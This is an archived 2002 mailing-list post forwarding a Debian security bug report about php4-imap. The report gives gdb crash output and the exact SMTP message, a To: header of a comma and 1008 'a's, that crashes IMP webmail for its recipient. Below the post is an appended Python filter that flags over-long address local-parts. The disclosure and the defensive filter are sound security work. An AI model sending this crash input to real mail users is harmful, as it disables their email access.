[dev] Reproducible Segmentation fault php4-imap

Jean Charles Delepine delepine@u-picardie.fr
Thu Oct 10 10:38:29 PDT 2002


Hello,

You should have a look at
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=163954&repeatmerged=yes

A bug in php4-imap which can render imp and imp3 unusable for
arbitrary users by sending them a particular email.

The Debian bug report (for those who don't like the web):

From: Jean Charles Delepine <delepine@u-picardie.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: php4-imap: Reproductible Segmentation fault in IMP whith php4-imap
X-Mailer: reportbug 1.50
Date: Wed, 09 Oct 2002 16:25:44 +0200
Message-Id: <20021009142544.C8DE18C2F@gip2.u-picardie.fr>
Delivered-To: submit@bugs.debian.org

Package: php4-imap
Version: 4:4.1.2-5
Severity: important
Tags: security

Hello,

By sending an email I get a segfault in php4-imap:

(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x404016bf in add_property_string_ex () from /usr/lib/apache/1.3/libphp4.so
(gdb) bt
#0  0x404016bf in add_property_string_ex () from /usr/lib/apache/1.3/libphp4.so
#1  0x4458c663 in zif_imap_mime_header_decode ()
   from /usr/lib/php4/20010901/imap.so
#2  0xf6a0401f in ?? ()
Cannot access memory at address 0x1e484014

The mail is (sorry for the long line):

mail from: <machin@domain.org>
250 Ok
rcpt to: <target@domain.net>
250 Ok
data
354 End data with <CR><LF>.<CR><LF>
To: ",aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaa"@u-picardie.fr

.
250 Ok: queued as F1C607DEC

The ',' is mandatory and can be anywhere in the string. There are 1008 'a's.

This segfault breaks IMP (stable and unstable versions) and makes them
unusable.

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux gip2 2.4.19-pre5 #6 SMP Fri Apr 5 09:50:06 CEST 2002 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages php4-imap depends on:
ii  libc6                         2.2.5-11.2 GNU C Library: Shared libraries an
ii  php4 [zendapi-20010901]       4:4.1.2-5  A server-side, HTML-embedded scrip
ii  php4-cgi [zendapi-20010901]   4:4.1.2-5  A server-side, HTML-embedded scrip

Sincerely,
            Jean Charles
-- 
Jean Charles Delépine - Équipe Réseaux Télécoms - Université de Picardie
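
A defensive pre-filter for the kind of message shown in the report, added here as an example (it is not part of the original post, of php4-imap or of IMP): it flags address headers whose local-part exceeds the 64-character SMTP limit of RFC 2821, which the quoted 1008-character string does. The function names, the header list and the example.net sample message are assumptions made for this example.

```python
import re
from email import message_from_bytes
from email.policy import compat32

MAX_LOCAL_PART = 64  # SMTP local-part limit (RFC 2821 / RFC 5321, section 4.5.3.1)
ADDRESS_HEADERS = ("From", "Sender", "Reply-To", "To", "Cc", "Bcc")

# A quoted local-part ("..."@) or a plain atom-style local-part directly before '@'.
LOCAL_PART = re.compile(r'"((?:[^"\\]|\\.)*)"\s*@|([^\s<>()",;:@]+)@', re.S)


def suspicious_local_parts(raw_message, limit=MAX_LOCAL_PART):
    """Return (header, length, has_comma) for every over-long local-part."""
    msg = message_from_bytes(raw_message, policy=compat32)
    findings = []
    for name in ADDRESS_HEADERS:
        for value in msg.get_all(name, []):
            # Undo header folding first: in the report the To: value
            # continues on a second, space-prefixed line.
            unfolded = re.sub(r"\r?\n(?=[ \t])", "", str(value))
            for match in LOCAL_PART.finditer(unfolded):
                local = match.group(1)
                if local is None:
                    local = match.group(2)
                if len(local) > limit:
                    findings.append((name, len(local), "," in local))
    return findings


def build_sample(to_value):
    """Constructed test message (hypothetical content, not a captured mail)."""
    text = "To: %s\r\nSubject: test\r\n\r\nbody\r\n" % to_value
    return text.encode("ascii")


if __name__ == "__main__":
    # Same shape as the reported header: a comma, 1008 'a's, folded once.
    folded = '",' + "a" * 984 + "\r\n " + "a" * 24 + '"@example.net'
    for finding in suspicious_local_parts(build_sample(folded)):
        print("reject or quarantine before webmail sees it:", finding)
```

Run at delivery time (for example from the MTA's content filter), a non-empty result is a reason to reject or quarantine the message before a webmail front end decodes its headers.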

